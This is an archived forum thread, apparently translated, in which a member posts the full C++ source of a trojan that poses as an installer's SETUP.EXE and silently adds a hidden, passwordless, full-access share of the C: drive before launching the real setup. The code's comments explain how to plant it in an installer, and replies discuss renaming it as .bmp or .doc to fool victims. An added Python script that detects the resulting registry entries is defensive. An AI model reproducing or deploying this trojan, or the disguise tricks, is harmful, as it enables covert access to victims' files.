
A slightly different trojan ...


Gary


Posted

From the site http://www.netninja.com I downloaded a trojan, SetupTrojan (read the details below). It was written by enigma, and the download does not include the program, only the source code, which you can compile with Visual C++.

```cpp
/*********************************************************************\
 SetupTrojan.cpp
 A Trojan Horse written by enigma <[email protected]>
 This source code is provided to the public domain.

 This program will add a hidden share to a user's machine--the share
 has no password and full security permissions. To access the share,
 one must be on the same LAN; from Start Menu/Run type
 \\computername\c$
 (where computername is the victim computer's network name).
 Please note: this share will occur only AFTER their system reboots.
 Good thing that most install programs require you to reboot!

 Installation: Compile this program into an executable (a nice touch
 would be to add a generic setup item to the program's resources).
 Locate the "SETUP.EXE" program in the installation you wish to
 infect. Rename it to "SETUP.___" and copy/rename this program
 to "SETUP.EXE". When the user double-clicks on the setup icon, it
 will run this trojan, which will then run the real setup program
\*********************************************************************/

#include <windows.h>
#include <process.h>

//This is the file name of the REAL setup program (the one that this
//trojan should call. It is interesting to note that it can have ANY
//extension--as long as the file's header isn't damaged, the OS will
//recognize it as being an executable.
#define PROGRAM_TO_RUN "setup.___"

//This function will check if "user level" or "password level" shares
//are currently in use.
BOOL userLevelSharingActive(void)
{
    HKEY key;
    DWORD type;
    BYTE buffer[30];
    DWORD len = sizeof(buffer);

    RegOpenKeyEx(HKEY_LOCAL_MACHINE, "Security\\Provider", 0, NULL, &key);
    RegQueryValueEx(key, "Platform_Type", 0, &type, buffer, &len);
    RegCloseKey(key);
    if (buffer[0] == 0x02)
        return TRUE;
    return FALSE;
}

void insertShare(void)
{
    HKEY key;
    DWORD returnCode;
    DWORD flags;
    char path[] = "C:\\";
    char remark[] = "";
    DWORD type = 0;
    unsigned char securityMask[2] = {0xFF, 0x80};
    BOOL userLevelSharing;

    //Determine what the flag needs to be--different for the two sharing methods
    if (userLevelSharing = userLevelSharingActive())
        flags = 0x193 | 0x200;
    else
        flags = 0x102 | 0x200;

    //Create/Open a key for the local path "C:\". We will be calling
    //it "C$", so it won't appear on the browse lists. If it can't be
    //opened, there is a problem (maybe it's being run on WinNT?)
    if (RegCreateKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\C$",
        0, 0, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &key, &returnCode) != ERROR_SUCCESS)
        return;
    //Make it read/write/system-hidden
    RegSetValueEx(key, "Flags", 0, REG_DWORD, (BYTE *)&flags, sizeof(flags));
    //No passwords
    RegSetValueEx(key, "Parm1enc", 0, REG_BINARY, NULL, 0);
    RegSetValueEx(key, "Parm2enc", 0, REG_BINARY, NULL, 0);
    //Let's see...what do we want to share...?
    RegSetValueEx(key, "Path", 0, REG_SZ, (BYTE *)path, sizeof(path));
    //"No comment."
    RegSetValueEx(key, "Remark", 0, REG_SZ, (BYTE *)remark, sizeof(path));
    //It's a share of type "File" (0)
    RegSetValueEx(key, "Type", 0, REG_DWORD, (BYTE*)&type, sizeof(type));
    //Free the handle
    RegCloseKey(key);

    if (userLevelSharing)
    {
        MessageBox(NULL, "User Level Code Reached", "", 0);
        //For user-level sharing, there is one additional step that needs
        //to be done--This is the same as dragging the "Everyone" world
        //icon into the "Custom" bin and toggling on all of the checkboxes
        if (RegCreateKeyEx(HKEY_LOCAL_MACHINE, "Security\\Access\\C:",
            0, 0, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &key, &returnCode) != ERROR_SUCCESS)
            return;
        if (returnCode==REG_CREATED_NEW_KEY)
            MessageBox(NULL, "Created new key", "", 0);
        else if (returnCode==REG_OPENED_EXISTING_KEY)
            MessageBox(NULL, "Opened existing key", "", 0);

        RegSetValueEx(key, "*", 0, REG_BINARY, (BYTE *)securityMask, 2);
        RegCloseKey(key);
    }
}

int WINAPI WinMain(
    HINSTANCE hInstance,     // handle to current instance
    HINSTANCE hPrevInstance, // handle to previous instance
    LPSTR lpCmdLine,         // pointer to command line
    int nCmdShow             // show state of window
)
{
    //Perform the nasty-work
    insertShare();
    //Chain to the REAL setup program
    spawnlp(_P_OVERLAY, PROGRAM_TO_RUN, PROGRAM_TO_RUN, NULL);
    return 0;
}
```

------------------
My name is Hobson
Gary Hobson
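A defender-side check for the registry changes the posted source makes, as an added example that is not part of the original post or of enigma's code: it scans a REGEDIT4-format registry export for LanMan share keys showing the traits visible in the source (a name ending in `$`, empty `Parm1enc` and `Parm2enc`, a drive root as `Path`, and the two `Flags` values the code writes). The sample export, the function names and the two-trait threshold are assumptions made for illustration.

```python
import re

LANMAN = (r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows"
          r"\CurrentVersion\Network\LanMan" "\\")
# Flags values the posted source writes: 0x102|0x200 and 0x193|0x200.
TROJAN_FLAGS = {0x302, 0x393}

# Constructed sample export (REGEDIT4 text), not from a real machine.
SAMPLE_REG = "REGEDIT4\n\n" + "\n".join([
    "[" + LANMAN + "DOCS]",
    r'"Flags"=dword:00000101', r'"Path"="C:\\DOCS"',
    r'"Parm1enc"=hex:', r'"Parm2enc"=hex:76,9a', "",
    "[" + LANMAN + "C$]",
    r'"Flags"=dword:00000302', r'"Path"="C:\\"',
    r'"Parm1enc"=hex:', r'"Parm2enc"=hex:', r'"Remark"=""',
])

def parse_shares(text):
    """Map share name -> {value name: raw value} for keys under LanMan."""
    shares, current = {}, None
    for line in (l.strip() for l in text.splitlines()):
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
            is_share = key.upper().startswith(LANMAN.upper())
            current = shares.setdefault(key[len(LANMAN):], {}) if is_share else None
        elif current is not None:
            m = re.match(r'"([^"]+)"=(.*)$', line)
            if m:
                current[m.group(1)] = m.group(2)
    return shares

def findings(text):
    """Return [(share, reasons)] for shares with >= 2 traits of the posted code."""
    out = []
    for name, v in parse_shares(text).items():
        reasons = []
        if name.endswith("$"):
            reasons.append("hidden ($) share name")
        if v.get("Parm1enc") == "hex:" and v.get("Parm2enc") == "hex:":
            reasons.append("both password values empty")
        if re.fullmatch(r'"[A-Za-z]:\\\\"', v.get("Path", "")):
            reasons.append("whole drive shared")
        flags = v.get("Flags", "")
        if flags.startswith("dword:") and int(flags[6:], 16) in TROJAN_FLAGS:
            reasons.append("Flags value written by the posted source")
        if len(reasons) >= 2:
            out.append((name, reasons))
    return out
```

Calling `findings(SAMPLE_REG)` reports only the `C$` entry, with all four reasons; the ordinary `DOCS` share matches none of them.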

Posted

This just opens the shares, and then you work through commands (nthack, I think it's called), but someone still has to run it, so if they're going to run it anyway, why not give them an authentic trojan?
I don't know if you understood me...

Posted

Of course I understood you, and I know about NT shares too. The good thing, though, is that you can give the file whatever extension you want, e.g. "setuptrojan.bmp" or "setuptrojan.doc", and that way you somewhat fool the "sceptics".

I should also say that enigma (I don't know if you saw his photos on his site) is a professional Visual C++ programmer and works at a large software company -

------------------
My name is Hobson
Gary Hobson

Posted

You guys reminded me of something: some idiot (a foreigner) who was telling another girl not to accept a txt file from a friend because it was a virus, hehe. After we all called her out, she banned us.
sigedrosou ;)

  • 3 weeks later...
Posted

Yes, indeed guys, since you can name it whatever you want, you can easily fool the other person.

-= SpY =-

Posted

Originally posted by SpY:
> Yes, indeed guys, since you can name it whatever you want, you can easily fool the other person.
> -= SpY =-

I don't suppose you're going to ban us too now ;) ...

------------------
EDgSTr5SmDY=

Posted

Originally posted by jesiko:
> dear GARY
> GO HOME!!!

Your stars will go up, don't be in a hurry, and don't make stupid posts.

Guys, has anyone tried it, does it work??

Posted

Gary is right.. never mind, our friend registered in April.. I must have been like that at the start too (I don't really remember.. ), the kid hasn't understood the atmosphere of the forum yet.. first time, so forgiven

------------------
Dream in order to live. If you don't dream, you're lost..
Regards
MaJoR_K

Posted

Originally posted by Anonymous:
> Gary is right.. never mind, our friend registered in April.. I must have been like that at the start too (I don't really remember.. ), the kid hasn't understood the atmosphere of the forum yet.. first time, so forgiven

He registered yesterday, and in fact I went to his house myself and showed him the ropes.

Otherwise he would never have found out about insomnia, I'd bet on it.

------------------
These insomniacs are crazy

Archived

This topic has been archived and is closed to further replies.
